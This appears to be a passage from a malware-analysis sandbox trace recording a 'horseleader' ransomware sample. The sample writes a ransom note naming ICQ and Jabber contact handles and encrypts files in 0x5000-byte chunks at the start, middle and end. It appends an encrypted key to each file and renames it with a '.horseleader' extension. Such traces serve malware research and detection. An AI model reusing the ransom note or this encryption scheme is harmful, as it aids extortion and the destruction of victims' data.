hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0181.572] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0181.572] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\#Decrypt#.txt") returned 89 [0181.572] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0181.572] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0181.572] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0181.574] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0181.574] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0181.574] CloseHandle (hObject=0x21c) returned 1 [0181.575] GetProcessHeap () returned 0x780000 [0181.575] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0181.575] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0181.575] lstrcmpiW (lpString1="Proof.fr", lpString2="Windows") returned -1 [0181.575] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr") returned 75 [0181.575] lstrcmpW (lpString1="Proof.fr", lpString2=".") returned 1 [0181.575] lstrcmpW (lpString1="Proof.fr", lpString2="..") returned 1 [0181.575] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0181.575] GetProcessHeap () returned 0x780000 [0181.576] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0181.576] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*") returned 77 [0181.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0181.576] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0181.576] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\.") returned 77 [0181.576] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0181.577] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="..", cAlternateFileName="")) returned 1 [0181.577] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0181.577] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\..") returned 78 [0181.577] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0181.577] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0181.577] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0181.577] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0181.577] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0181.577] StrStrIW (lpFirst="Proof.cab", lpSrch=".horseleader") returned 0x0 [0181.577] lstrcmpW (lpString1="Proof.cab", lpString2="#Decrypt#.txt") returned 1 [0181.577] lstrcmpW (lpString1="Proof.cab", lpString2="_uninstalling_.png") returned 1 [0181.578] lstrlenW (lpString=".testttjffg") returned 11 [0181.578] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", lpSrch=".testttjffg") returned 0x0 [0181.578] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0181.578] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0181.578] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0181.578] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0181.579] StrStrW (lpFirst="Proof.cab", lpSrch=".txt") returned 0x0 [0181.579] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=21064532) returned 1 [0181.579] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.579] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0182.165] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0182.165] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0182.166] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xa08daa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.166] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0182.172] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0182.172] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0182.173] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1411b54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.173] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0182.181] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0182.181] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0182.182] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.182] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0182.183] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0182.183] CloseHandle (hObject=0x158) returned 1 [0187.909] GetProcessHeap () returned 0x780000 [0187.909] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0187.910] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.horseleader") returned 97 [0187.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.horseleader")) returned 1 [0187.912] GetProcessHeap () returned 0x780000 [0187.912] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0187.912] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2e3b660, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd8400, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0187.912] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0187.912] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0187.913] StrStrIW (lpFirst="Proof.msi", lpSrch=".horseleader") returned 0x0 [0187.913] lstrcmpW (lpString1="Proof.msi", lpString2="#Decrypt#.txt") returned 1 [0187.913] lstrcmpW (lpString1="Proof.msi", lpString2="_uninstalling_.png") returned 1 [0187.913] lstrlenW (lpString=".testttjffg") returned 11 [0187.913] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi", lpSrch=".testttjffg") returned 0x0 [0187.913] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0187.913] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0187.914] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0187.945] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0187.945] StrStrW (lpFirst="Proof.msi", lpSrch=".txt") returned 0x0 [0187.945] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=885760) returned 1 [0187.945] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.945] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0187.948] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0187.948] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0187.949] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x69a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.949] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0188.850] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0188.850] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0188.851] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xd3400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.851] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0189.008] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0189.008] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0189.008] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.008] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0189.008] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0189.009] CloseHandle (hObject=0x158) returned 1 [0189.729] GetProcessHeap () returned 0x780000 [0189.729] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0189.729] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.horseleader") returned 97 [0189.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.horseleader")) returned 1 [0189.730] GetProcessHeap () returned 0x780000 [0189.730] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0189.731] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0189.731] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0189.731] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0189.731] StrStrIW (lpFirst="Proof.xml", lpSrch=".horseleader") returned 0x0 [0189.731] lstrcmpW (lpString1="Proof.xml", lpString2="#Decrypt#.txt") returned 1 [0189.731] lstrcmpW (lpString1="Proof.xml", lpString2="_uninstalling_.png") returned 1 [0189.732] lstrlenW (lpString=".testttjffg") returned 11 [0189.732] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpSrch=".testttjffg") returned 0x0 [0189.732] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0189.733] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0189.733] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.733] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0189.733] StrStrW (lpFirst="Proof.xml", lpSrch=".txt") returned 0x0 [0189.733] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1458) returned 1 [0189.733] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5b2, lpOverlapped=0x0) returned 1 [0189.739] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0189.739] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5b2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5b2, lpOverlapped=0x0) returned 1 [0189.739] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.739] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0189.739] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, 